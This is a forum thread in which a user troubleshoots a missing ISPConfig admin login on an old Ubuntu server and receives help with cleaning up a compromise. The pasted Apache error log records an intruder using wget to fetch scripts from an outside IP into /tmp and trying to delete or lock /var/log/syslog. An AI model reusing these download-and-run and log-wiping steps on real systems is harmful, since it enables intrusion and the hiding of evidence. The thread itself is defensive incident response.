Hey guys, I've got ISPConfig 3 running on Ubuntu 9.04. It's been great for quite some time. However, for some reason I no longer have boxes available to log into the admin page. The login page comes up with the usual look, just no place to enter admin credentials. I'm sure it is something I did but I am stumped. Any ideas? Thanks in advance for any help.
Take a look at the apache error.log. maybe you changed some php.ini settings that prevent ispconfig to work.
error.log Till, Thanks for the response. Following is my Apache2 error.log file. I don't know what I'm looking at but the one thing that sticks out is the repeated connections to 221.132.37.26:80. This is not my IP address. Neither is 54.246.4.70. Does anything else look out of place? If this is something I should not post here, please let me know. [Sun Mar 02 06:50:21 2014] [notice] Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g configured -- resuming normal operations [Sun Mar 02 06:50:21 2014] [warn] long lost child came home! (pid 14375) [Sun Mar 02 06:50:21 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter [Sun Mar 02 06:50:43 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter [Sun Mar 02 06:55:17 2014] [notice] mod_fcgid: call /var/www/goodcarinsurance.net/web/compare-car-insurance-rate.php with wrapper /var/www/php-fcgi-scripts/web15/.php-fcgi-starter [Sun Mar 02 07:10:16 2014] [error] [client 130.185.109.239] File does not exist: /var/www/robots.txt [Sun Mar 02 07:26:31 2014] [notice] mod_fcgid: call /var/www/rockwalldata.com/web/index.php with wrapper /var/www/php-fcgi-scripts/web23/.php-fcgi-starter [Sun Mar 02 08:18:01 2014] [notice] mod_fcgid: call /var/www/lakesideambucs.org/web/index.php with wrapper /var/www/php-fcgi-scripts/web29/.php-fcgi-starter [Sun Mar 02 09:14:34 2014] [error] [client 37.9.53.129] File does not exist: /var/www/administrator [Sun Mar 02 09:28:47 2014] [error] [client 66.249.79.82] File does not exist: /var/www/robots.txt [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:45-- http://221.132.37.26/sh [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80... [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] connected. [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response... [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 200 OK [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Length: 1069 (1.0K) [text/plain] [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Saving to: `/tmp/sh' [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 0K . 100% 103M=0s [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:45 (103 MB/s) - `/tmp/sh' saved [1069/1069] [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] rm: [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot remove `/var/log/syslog' [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] touch: [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot touch `/var/log/syslog' [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chmod: [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] changing permissions of `/var/log/syslog' [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Operation not permitted [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chattr: Permission denied [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] while reading flags on /var/log/syslog\r [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:48-- http://221.132.37.26/ru [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80... [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] connected. [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response... [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 200 OK [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Length: 944 [text/plain] [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Saving to: `ru' [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 0K 100% 84.9M=0s [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:49 (84.9 MB/s) - `ru' saved [944/944] [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] [Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:50-- http://221.132.37.26/rr [Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80... [Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] connected.
According to the log, just a website is hacked. So it might not be nescessary to reinstall the whole server. Chcek the /tmp directory for unusual files and post a : ls -la /tmp to see which user owns these files. Then you should scan the server with rkhunter and maldetect: http://www.howtoforge.com/forums/showpost.php?p=286287&postcount=9
Thanks, Till, Here is the ls la /tmp total 80 drwxrwxrwx 4 root root 65536 2014-03-17 21:35 . drwxr-xr-x 22 root root 4096 2014-03-17 18:39 .. drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .ICE-unix drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .X11-unix I ran maldetect and it found and quarantined 5 items. This may have fixed my issues but I don't know since I still do not have login boxes for the ISPConfig admin page. So I can't log in. I installed RKHunter but it would not run. User error I'm sure. I get the following error. 'Invalid SCRIPTWHITELIST configuration option: Non-existent pathname: /usr/sbin/prelink' Very grateful for any and all help.
DNS issues? In the interest of full disclosure, here are some more symptoms that could be entirely unrelated. 1) I recently was forced to switch ISP's. I am now on AT&T 2) When the server is plugged in I seem to have basic surfing issues with other computers in my network. 3) The issues seem to be DNS related. Websites become slow to respond and there seems to be trouble "resolving host" Could the server be overriding DNS calls or something? I feel I could investigat more if I could just log in to ISPConfig. Thanks again.
